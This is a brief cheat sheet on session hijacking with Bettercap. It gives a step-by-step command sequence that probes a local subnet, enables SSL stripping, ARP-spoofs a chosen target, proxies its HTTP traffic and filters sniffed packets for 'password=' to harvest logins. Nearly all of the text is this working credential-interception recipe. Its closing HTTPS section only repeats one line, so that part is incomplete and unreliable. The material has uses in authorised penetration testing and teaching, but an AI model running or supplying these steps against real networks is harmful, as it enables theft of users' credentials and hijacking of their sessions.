session-hijacking-cheat-sheet.md

Session hijacking cheat sheet

Bettercap

Using Bettercap to collects all http logins used by routers, servers, and websites that do not have SSL enabled

bettercap -iface eth0

-iface: Specifies the interface to bind to.

net.probe on

This module will send different types of probe packets to each IP in the current subnet for the net.recon module to detect them.

net.recon on

The net.recon module displays the detected active IP addresses in the network. In real-time, this module will start sniffing network packets.

set http.proxy.sslstrip true

This module enables SSL stripping.

set arp.spoof.internal true

This module spoofs the local connections among computers of the internal network.

set arp.spoof.targets [Target IP]

This module spoofs the IP address of the target host.

http.proxy on

This module initiates http proxy.

arp.spoof on

This module initiates arp spoofing.

net.sniff on

This module is responsible for performing sniffing on the network.

set net.sniff.regexp '.*password=.+'

This module will only consider the packets sent with a payload matching the given regular expression (in this case, ‘.*password=.+’).

Using Bettercap to sniff network traffic from https-based websites

set http.proxy.sslstrip true

<- Back to index

---

License

© 2023 javierizquierdovera.com

Licensed under the Apache License, Version 2.0 (LICENSE-APACHE) or the MIT license (LICENSE-MIT), at your option.

SPDX-License-Identifier: (Apache-2.0 OR MIT)